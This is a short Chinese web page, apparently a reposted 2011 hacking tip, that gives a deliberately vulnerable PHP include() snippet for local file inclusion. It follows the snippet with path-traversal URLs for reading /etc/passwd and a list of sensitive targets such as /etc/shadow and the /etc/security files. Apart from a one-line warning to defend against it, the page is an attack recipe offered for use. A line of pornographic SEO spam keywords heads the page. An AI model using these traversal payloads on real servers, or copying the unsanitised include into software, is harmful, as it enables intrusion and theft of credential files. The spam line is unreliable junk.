亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

php 偽造本地文件包含漏洞的代碼

 更新時間:2011年11月03日 23:33:36   作者:  
php 偽造本地文件包含漏洞的代碼,大家一定要注意防范。
代碼:
復制代碼 代碼如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以這樣使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

獲取更多數(shù)據(jù):
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

來自hackteach

相關文章

最新評論